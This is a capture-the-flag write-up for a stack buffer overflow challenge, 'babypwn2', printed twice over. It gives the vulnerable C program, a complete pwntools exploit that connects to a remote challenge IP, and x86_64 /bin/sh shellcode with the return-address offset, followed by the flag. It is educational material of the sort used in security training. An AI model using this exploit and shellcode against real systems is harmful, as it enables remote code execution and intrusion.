Pwn - babypwn2

Second part of babypwn.

Last updated 1 month ago

Pwn - babypwn2

Second part of babypwn.

This is one another pwn challenge but here there is no direct secret() function to call.

#include <stdio.h>
#include <string.h>

void vulnerable_function()
{
    char buffer[64];
    printf("Stack address leak: %p\n", buffer);
    printf("Enter some text: ");
    fgets(buffer, 128, stdin);
}

int main()
{
    setvbuf(stdout, NULL, _IONBF, 0);
    printf("Welcome to the baby pwn 2 challenge!\n");
    vulnerable_function();
    printf("Goodbye!\n");
    return 0;
}

from pwn import *

target = remote('34.162.119.16', 5000)

# to spawn a x64 /bin/sh shell
shell = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 

welcome = target.recvline()
leak = target.recvline()
addr = int(leak.split(b': ')[1].strip(), 16) # parsing the leaked stack address
print(f"stack address: {hex(addr)}")

padding = b"A" * 72
ret = p64(addr + 80)
payload = padding + ret + shell
target.sendline(payload)

target.interactive()

Oberservations in chall.c :

a vulnerable_function() where the fgets() function allows an overflow due to no bounds check.
stack address is leaked (printf("Stack address leak: %p\n", buffer)).
buffer size is 64 bytes, but fgets() reads up to 128 bytes from the input.
no protection mechanisms like stack canaries or ASLR.

Solution :

The exploit script uses the stack address leak to craft a payload that spawns a shell and gains access to the system.

the challenge leaks the stack address of the buffer. This allows easy calculation of where to overwrite the return pointer.
the solve script includes a shellcode payload for spawning a shell. This is a typical x86_64 shellcode:

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

This shellcode spawns a /bin/sh shell when executed.

payload consists of 72 bytes of padding ("A" * 72) to fill the buffer up to retr addr, return address calculated as the leaked stack address (addr + 80) and the shellcode appended at end of the payload.

flag - uoftctf{sh3llc0d3_1s_pr3tty_c00l}

PreviousPwn - babypwn

Last updated 1 month ago

This is one another pwn challenge but here there is no direct secret() function to call.

#include <stdio.h>
#include <string.h>

void vulnerable_function()
{
    char buffer[64];
    printf("Stack address leak: %p\n", buffer);
    printf("Enter some text: ");
    fgets(buffer, 128, stdin);
}

int main()
{
    setvbuf(stdout, NULL, _IONBF, 0);
    printf("Welcome to the baby pwn 2 challenge!\n");
    vulnerable_function();
    printf("Goodbye!\n");
    return 0;
}

from pwn import *

target = remote('34.162.119.16', 5000)

# to spawn a x64 /bin/sh shell
shell = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 

welcome = target.recvline()
leak = target.recvline()
addr = int(leak.split(b': ')[1].strip(), 16) # parsing the leaked stack address
print(f"stack address: {hex(addr)}")

padding = b"A" * 72
ret = p64(addr + 80)
payload = padding + ret + shell
target.sendline(payload)

target.interactive()

Oberservations in chall.c :

a vulnerable_function() where the fgets() function allows an overflow due to no bounds check.
stack address is leaked (printf("Stack address leak: %p\n", buffer)).
buffer size is 64 bytes, but fgets() reads up to 128 bytes from the input.
no protection mechanisms like stack canaries or ASLR.

Solution :

The exploit script uses the stack address leak to craft a payload that spawns a shell and gains access to the system.

the challenge leaks the stack address of the buffer. This allows easy calculation of where to overwrite the return pointer.
the solve script includes a shellcode payload for spawning a shell. This is a typical x86_64 shellcode:

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

This shellcode spawns a /bin/sh shell when executed.

payload consists of 72 bytes of padding ("A" * 72) to fill the buffer up to retr addr, return address calculated as the leaked stack address (addr + 80) and the shellcode appended at end of the payload.

flag - uoftctf{sh3llc0d3_1s_pr3tty_c00l}